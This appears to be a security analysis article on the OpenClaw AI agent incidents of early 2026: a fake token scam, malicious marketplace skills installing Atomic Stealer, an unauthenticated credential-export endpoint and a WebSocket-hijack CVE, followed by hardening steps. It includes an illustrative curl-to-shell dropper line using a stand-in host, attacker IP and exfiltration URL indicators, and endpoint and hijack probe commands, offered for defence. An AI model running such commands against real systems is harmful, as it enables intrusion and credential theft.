OpenClaw (Clawdbot) Created the First Victims of AI Agents
2026/02/09

An open-source AI agent with 160K GitHub stars triggered a fake token scam, a malware supply chain attack, and mass credential leaks in just 10 days. This isn't a security incident — it's the first full exposure of a structural flaw in the AI agent category.

$16 Million Evaporated in 10 Seconds

On January 27, 2026, an Austrian developer released a Twitter handle. Ten seconds later, a professional scammer snatched it. Within hours, a fake token listed under that handle hit a $16 million market cap. Hours after that, it crashed over 90%.

The developer was Peter Steinberger. His open-source project Clawdbot hit 60,000 GitHub stars within three days of launching in November 2025. It passed 100,000 in a week. By late January 2026, it surpassed 160,000 stars and attracted 2 million visitors in a single week. It was an AI agent that could take over your computer — managing email, calendar, messaging apps, executing shell commands, reading and writing your file system.

Anthropic decided "Clawd" sounded too much like "Claude" and demanded a name change. Steinberger renamed it to Moltbot, then three days later to OpenClaw. Between those two renames, he needed to release the old @clawdbot handle to register new ones.

In that ten-second window, everything collapsed.

The snatcher got a handle with real followers, real post history, and a real avatar. They posted an "official Clawdbot governance token" called $CLAWD. Because the account looked 100% legitimate, thousands of users assumed it was real. FOMO plus Solana liquidity manipulation sent $CLAWD's market cap soaring.

Steinberger posted: "I will never do a coin. Any project that lists me as coin owner is a SCAM."

Too late. Following the typical Solana meme coin rug pull pattern, the operators cashed out 10-30% of the market cap before the crash. Ten percent of $16 million is $1.6 million. Time spent: under 24 hours.

Meanwhile, Twitter was flooded with "everyone's making money with Clawdbot" posts. One account described making "six-figure profits" on Polymarket with Clawdbot. Another claimed "Free ClawdBot is printing money on Polymarket... made about $460K." These posts weren't sharing experiences. They were manufacturing FOMO for the $CLAWD token.

OpenClaw: 72-Hour Collapse (January 27 to February 3, 2026)

  • Jan 27: Clawdbot → Moltbot. Steinberger releases the @clawdbot handle while preparing to register @moltbot.
  • 10 seconds later: a professional handle sniper hijacks @clawdbot and posts the $CLAWD token.
  • Hours later: $CLAWD hits a $16M market cap. FOMO-driven retail investors pile in; Polymarket "profit screenshots" fuel the hype.
  • Steinberger issues an emergency denial ("I will never do a coin"); $CLAWD crashes over 90%.
  • Jan 28: 341 malicious ClawHub skills discovered; Atomic Stealer (AMOS) deployed via plugins.
  • Jan 30: rebrand to OpenClaw; 21,000+ instances exposed to the internet with API keys and chat logs fully accessible.
  • Feb 3: CVE-2026-25253 disclosed. One click gives full remote control. CVSS 8.8; 52 countries affected; 30,000+ exposed instances; security score 2/100.

Sources: Forbes, SecurityWeek, ZeroLeaks, Hunt.io, NIST

The First Victims Didn't Get Hacked — They Voluntarily Handed Over the Keys

The $CLAWD token victims were a classic crypto fraud story. The second wave of victims is more interesting because they were technical users who thought they were making rational decisions.

OpenClaw has a skill marketplace called ClawHub, where users install extensions for their AI agent. The barrier to entry for publishing skills is remarkably low: a GitHub account older than one week, no code review process.

Security researchers discovered an attack campaign codenamed ClawHavoc. Koi Security audited 2,857 skills and found 341 malicious ones — a 12% infection rate. Another firm, SlowMist, reported 472 affected skills sharing the same attack infrastructure.

At least 14 individuals were identified as contributing malicious content, though some may have been compromised legitimate accounts. The most prolific, hightower6eu, uploaded 354 malicious packages focused on crypto analytics. Another actor, Sakaen736jih, was observed submitting new malicious skills every few minutes in early February using an automated deployment script. An established account, davidsmorais, uploaded a mix of legitimate and malicious skills — consistent with an account takeover.

Over 100 malicious skills masqueraded as crypto tools: Solana wallet trackers, Phantom wallet utilities, Ethereum gas monitors, Bitcoin blockchain analyzers, insider wallet finders. Another batch disguised as Polymarket prediction bots, precisely targeting the Clawdbot user base's interests.

The attack didn't execute malicious code directly. Instead, skills displayed a simulated error or "environment verification" prompt, instructing users to execute a base64-encoded terminal command to "fix" the issue. This command connected to attacker infrastructure at 91.92.242[.]30 and downloaded a second-stage dropper script. Security researchers call this technique ClickFix. Users thought they were fixing their environment. They were installing a backdoor.
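The lure's shape is worth recognizing on sight. Here is a purely illustrative sketch (the encoded string and the evil.example domain are hypothetical, not the actual ClawHavoc payload) of the one-liner pattern, plus the safe way to inspect such a command: decode it without the trailing pipe into a shell.

```bash
# Typical ClickFix lure shape (hypothetical payload; never run these):
#   echo 'Y3VybCAtcyBodHRwOi8vZXZpbC5leGFtcGxlL2Ryb3BwZXIuc2ggfCBzaA==' | base64 -d | sh
#
# Safe inspection: decode WITHOUT "| sh" to see what it would have done.
echo 'Y3VybCAtcyBodHRwOi8vZXZpbC5leGFtcGxlL2Ryb3BwZXIuc2ggfCBzaA==' | base64 -d
# prints: curl -s http://evil.example/dropper.sh | sh
```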

The payload was Atomic macOS Stealer (AMOS), a 521KB universal Mach-O binary (x86_64 + arm64). It's sold on dark web Telegram channels for $500-1,000/month. AMOS uses runtime string decryption to evade static analysis, clears the quarantine attribute to bypass macOS Gatekeeper, and employs ptrace() and sysctl() to detect and evade debuggers.

Exfiltrated data was uploaded to socifiapp[.]com/api/reports/upload. The ClawHavoc campaign reached over 120 countries.

ClawHavoc Attack Chain Anatomy: from "install a skill" to "wallet drained" in three steps

  • Step 1: Disguise. Fake skills published on ClawHub ("Solana Wallet Tracker," "Polymarket Prediction Bot," "AI Trading Bot," "Ethereum Gas Monitor"). Entry barrier: a 1-week-old GitHub account, no code review. 14 actors; one uploaded 354 packages, one auto-submitted new skills every few minutes.
  • Step 2: ClickFix social engineering. A simulated error tells the user to "fix your environment" by running a base64-encoded terminal command. The command connects to 91.92.242[.]30 and downloads a dropper; the second stage installs the AMOS backdoor.
  • Step 3: Atomic Stealer harvests. AMOS (521KB Mach-O binary) grabs 60+ crypto wallets' seed phrases; browser passwords, cookies, and autofill; a full macOS Keychain dump; and SSH keys, API keys, and .env variables. Exfiltration to socifiapp[.]com. Sold as malware-as-a-service for $500-1,000/month, with Gatekeeper bypass, anti-debugging, and runtime string decryption.

Victim profile: technical users, crypto holders, open-source trust. They installed productivity tools and got backdoors instead.

Sources: Koi Security, Bitdefender, The Hacker News, SlowMist

An Endpoint You've Probably Never Heard Of: /api/export-auth

Most coverage focused on CVE-2026-25253 and ClawHavoc. But there's an equally lethal issue that received almost no attention.

OpenClaw has an endpoint designed for backing up user credentials: /api/export-auth. The problem: it has no authentication or authorization checks whatsoever.

Anyone who can reach this endpoint — whether through an exposed gateway or via the CVE-2026-25253 one-click exploit — can extract all API tokens stored in your OpenClaw instance. OpenAI, Claude, Google AI. Plaintext. No encryption.
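If you run an instance yourself, the exposure is easy to self-check. A minimal sketch, assuming the default gateway port of 18789; the response format is an assumption, and you should run this only against your own deployment:

```bash
# Self-check against YOUR OWN instance only. If this returns provider
# tokens without any authentication, the endpoint is exposed.
curl -s http://127.0.0.1:18789/api/export-auth
```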

Hunt.io published a report on February 3: "Hunting OpenClaw Exposures: CVE-2026-25253 in Internet-Facing AI Agent Gateways." Their initial scans had identified over 17,500 exposed OpenClaw instances across 52 countries, 98.6% of them running on cloud infrastructure; by late January that number had grown past 21,000. By February 8, The Hacker News reported it had exceeded 30,000.

The CVE-2026-25253 kill chain is more sophisticated than most reports describe. Attackers don't just steal the auth token — they use Cross-Site WebSocket Hijacking to connect to the victim's OpenClaw instance, disable security prompts, and execute arbitrary shell commands on the host system. It's a complete kill chain from "click a link" to "full computer control."
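The precondition for the hijacking step is a gateway that accepts WebSocket handshakes from arbitrary Origins, and you can probe your own deployment for that by hand. A minimal sketch, assuming the WebSocket endpoint sits at the root path (an assumption; adjust for your deployment):

```bash
# Send a WebSocket handshake with a hostile Origin to your own gateway.
# "HTTP/1.1 101 Switching Protocols" means the cross-origin handshake was
# accepted; a patched server should reject the unknown Origin instead.
curl -i -s --max-time 5 http://127.0.0.1:18789/ \
  -H "Connection: Upgrade" \
  -H "Upgrade: websocket" \
  -H "Sec-WebSocket-Version: 13" \
  -H "Sec-WebSocket-Key: $(openssl rand -base64 16)" \
  -H "Origin: https://attacker.example"
# (After a successful upgrade curl just waits for frames, so the
# --max-time timeout firing is expected.)
```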

Security engineer Lucas Valbuena's ZeroLeaks assessment became one of the most shared security tweets of the year. Overall score: 2/100. System prompt extraction rate: 84%. Prompt injection success rate: 91%.

Snyk found that 283 out of 3,984 ClawHub skills (7.1%) had design flaws that instructed the AI agent to write API keys, passwords, and credit card numbers in plaintext to output logs. These weren't malicious skills — just poorly written ones. The effect was the same.

OpenClaw Security Dashboard: multiple independent audit results

  • Overall security score: 2/100 (ZeroLeaks; critical)
  • Prompt injection success rate: 91% (nearly defenseless)
  • System prompt extraction rate: 84% (system prompt leaked on turn 1)
  • Exposed instances: 30,000+ (Hunt.io; 52 countries; 98.6% cloud)
  • CVE-2026-25253 (CVSS 8.8): malicious link → WebSocket hijack → token theft → security prompts disabled → arbitrary execution on the host
  • /api/export-auth endpoint: no auth; exports all configured AI service API tokens in plaintext (OpenAI, Claude, Google AI)
  • ClawHub marketplace: 283 of 3,984 skills (7.1%) leak credentials through non-malicious design flaws (API keys and passwords in plaintext logs)

Cisco: "An infostealer disguised as a personal assistant"

Sources: ZeroLeaks, Hunt.io, DepthFirst, Snyk, Cisco, NIST

This Isn't a Problem You Can Patch

Daniel Miessler is known in the security community as an AI optimist — a "98% AI YOLO Maximalist." But on January 27, he posted: "I'm asking you to please listen to this. Here are some of the top security issues with clawd.bot that you all should be avoiding."

OpenClaw's security problems aren't the kind you fix by updating to the latest version. They represent a structural contradiction baked into the AI agent product category.

A useful AI agent needs access to your email, calendar, file system, and messaging apps. It needs to execute code, call APIs, and interact with web pages. Its value comes from having maximum permissions. Restricting permissions means restricting functionality.

Traditional software security is built on determinism — you audit the code, you know what it does. AI agents are non-deterministic. The same input can produce different outputs. You can't protect unpredictable software with traditional whitelists and firewalls.

CrowdStrike and Trend Micro released "Agentic AI Security Framework" reports in early 2026. Their conclusion: traditional security tools cannot protect non-deterministic AI agents. What's needed is an entirely new governance paradigm.


"Shadow AI" and the Numbers Keeping CISOs Awake

The $CLAWD scam hurt retail speculators. ClawHavoc hurt technical users. But enterprises may suffer the largest losses.

CISO survey data from 2026 reveals a disturbing reality: 71% of AI tools already have access to core business systems, but only 16% of organizations govern this access effectively. 92% of organizations lack full visibility into AI identity activity. 95% doubt their ability to detect AI misuse.

75% of CISOs have discovered unauthorized AI tools in their environments — tools with embedded credentials or elevated system access that aren't being monitored. CISOs now rank "shadow AI" as their number one security risk.

Why do employees do this? 60% of surveyed employees admitted they'd take security risks by using unauthorized AI tools to get work done faster. OpenClaw is exactly the kind of tool that's irresistible to install and try.

Then things get very bad. An employee installs OpenClaw on a work computer, grants it access to company email, code repositories, and internal docs. The gateway port is left open, authentication isn't configured, or a ClawHub skill with an AMOS backdoor gets installed. The company's source code, customer data, and internal communications get packaged and exfiltrated.

There's a cascading consequence most people don't know about: by Q3 2026, cyber insurance policies are expected to explicitly exclude AI agent-related breaches unless specific controls are demonstrated. 97% of organizations reporting AI-related incidents lacked proper access controls. In other words, if your company suffers a data breach because an employee deployed OpenClaw without authorization, insurance may not cover it.

CISO Survey: The Scale of Shadow AI (enterprise AI security governance in 2026)

  • 71% of AI tools have core business access; only 16% are governed effectively
  • 92% of organizations have no visibility into AI identity activity; 95% can't detect AI misuse
  • 75% of CISOs found unauthorized AI tools, some with embedded credentials
  • 60% of employees are willing to take security risks by using unauthorized AI tools
  • OpenClaw "shadow AI" attack scenario: employee installs → grants email/repo access → gateway exposed → source code, customer data, and internal comms exfiltrated
  • CrowdStrike: AI agents amplify data exposure at machine speed
  • Cyber insurance is excluding AI agent incidents from Q3 2026: no specific controls, no coverage; 97% of orgs reporting AI incidents lacked access controls

The CISO's dilemma: ban AI and fall behind, or allow AI and accept an ungovernable attack surface.

Sources: Axis Capital, CrowdStrike, Kiteworks, BlackFog, The AI Counsel

If You Must Use It, Here's the Configuration That Can Save You

Steinberger partnered with Google's VirusTotal to scan ClawHub skills, established a vulnerability reporting process, and hired the researcher who found the critical flaws. But the following configuration is on you. This isn't advice. It's a survival baseline.

Update immediately to v2026.1.29 or later. CVE-2026-25253 is patched in this version. Any earlier version is exploitable with a single click right now.

Then rotate every credential. If you used a vulnerable version and visited any untrusted website, assume all your API tokens are compromised. OpenAI, Claude, Google AI — rotate everything.

Deploy to an isolated environment. Don't run OpenClaw on your primary machine. Use a dedicated device, VPS, or virtual machine. DigitalOcean offers a hardened one-click deploy. If using Docker, add: --read-only (prevent filesystem writes), --security-opt=no-new-privileges (prevent privilege escalation), --cap-drop=ALL (remove all Linux capabilities).
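Assembled into a single launch command, that hardening might look like the sketch below. The image name openclaw/openclaw and the config path are placeholders, not the project's official image; only the three flags come from the guidance above.

```bash
docker run -d --name openclaw \
  --read-only \
  --security-opt=no-new-privileges \
  --cap-drop=ALL \
  --tmpfs /tmp \
  -p 127.0.0.1:18789:18789 \
  -v "$HOME/.openclaw:/data" \
  openclaw/openclaw
# --read-only plus --tmpfs /tmp: immutable filesystem with scratch space
# -p 127.0.0.1:...: binds the gateway to loopback only, never 0.0.0.0
```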

Lock down the network. Never expose OpenClaw's gateway port (default 18789) to the public internet. Use Tailscale for private encrypted tunnels. If public access is unavoidable, place the gateway behind NGINX with strong authentication and rate limiting, and verify the gateway's auth setting is not none. Restrict outbound traffic to only the necessary API endpoints (OpenAI, Anthropic) and block all other internet access to prevent exfiltration.
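Two quick checks catch the most common mistake, a gateway bound to all interfaces:

```bash
# If this shows 0.0.0.0:18789 or [::]:18789, the gateway listens on every
# interface and may be internet-facing; 127.0.0.1:18789 is loopback only.
ss -tlnp | grep 18789

# Then confirm from outside your network (e.g., a phone hotspot) that the
# port is actually unreachable:
nmap -p 18789 <your-public-ip>
```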

Set sandbox mode to maximum. OpenClaw's sandbox.mode setting controls which sessions run sandboxed. Set it to non-main (sandboxes group chats and external channels) or all (sandboxes everything; the safest option, at the cost of some latency). Restrict the high-risk tools exec, browser, web_fetch, and web_search to trusted agents only, as in the configuration sketch below.
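A configuration sketch: the file location and schema here are assumptions (check the project documentation). Only sandbox.mode, its values, and the four tool names come from the guidance above; the allowedAgents key is hypothetical.

```bash
# Hypothetical config path and schema; adjust to the real ones.
cat > ~/.openclaw/config.json <<'EOF'
{
  "sandbox": { "mode": "all" },
  "tools": {
    "exec":       { "allowedAgents": ["main"] },
    "browser":    { "allowedAgents": ["main"] },
    "web_fetch":  { "allowedAgents": ["main"] },
    "web_search": { "allowedAgents": ["main"] }
  }
}
EOF
```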

Broker credentials, don't expose them. Don't let OpenClaw handle API tokens directly. Use OAuth brokering solutions (like Composio) to isolate sensitive credentials. Configure short-lived session tokens instead of permanent ones. OpenClaw has been found to store credentials in plaintext in local config files.
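Even without a full OAuth broker, you can at least get keys out of plaintext config files. A minimal macOS sketch using the built-in Keychain CLI; whether OpenClaw reads OPENAI_API_KEY from the environment is an assumption, and the openclaw launch command is a placeholder:

```bash
# Store the key once in the Keychain instead of a config file:
security add-generic-password -a "$USER" -s openai-api-key -w 'sk-REDACTED'

# Inject it at launch without ever writing it to disk:
OPENAI_API_KEY="$(security find-generic-password -s openai-api-key -w)" openclaw
```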

Lock down chat integrations. Never let your OpenClaw bot join public channels where strangers can send it messages. Restrict command acceptance to specific user IDs. Enable MFA on all integrated accounts.

Enable audit logging. Monitor every action OpenClaw executes. Watch for unexpected config changes and command execution. Treat all links, attachments, and pasted instructions from untrusted sources as hostile by default.
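Two low-effort monitoring habits, sketched below; the process name and log path are assumptions to adapt to your deployment:

```bash
# Snapshot the agent's open network connections; anything beyond your
# expected API endpoints deserves a closer look.
lsof -nP -i -a -p "$(pgrep -d, -f openclaw)"

# Watch the gateway log for command execution and config changes
# (log path is a placeholder):
tail -f ~/.openclaw/logs/gateway.log | grep -Ei 'exec|config'
```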


160K Stars ≠ Security

160,000 GitHub stars. 2 million weekly visitors. OpenClaw was one of the fastest-growing open-source projects of 2025.

But star count measures popularity, not security. High popularity made OpenClaw a more attractive attack target. Scammers chose it for the fake token, malware authors chose ClawHub as a distribution channel — all because the user base was large enough.

OpenClaw reveals a fundamental dilemma in the AI agent category. User value comes from maximizing permissions. Security risk also comes from maximizing permissions. There's no room for compromise.

You can't tell an AI agent "manage my email but don't read my email." You can't say "execute code but not malicious code." It can't tell the difference. It's non-deterministic. The same instruction in different contexts can produce entirely different behavior.

The configuration checklist above can't solve the fundamental contradiction. But it can move you from "near-certain to be attacked" to "at least not the easiest target." In an ecosystem where 30,000 instances are exposed to the public internet, that's already a significant advantage.


Sources: Forbes, The Hacker News, BleepingComputer, SecurityWeek, Snyk, CrowdStrike, Trend Micro, Bitdefender, ZeroLeaks, DepthFirst, Hunt.io, Cisco, Koi Security, SlowMist, Composio, NIST CVE Database

Disclaimer: This article does not constitute investment advice. All cryptocurrency tokens mentioned are confirmed scam projects.
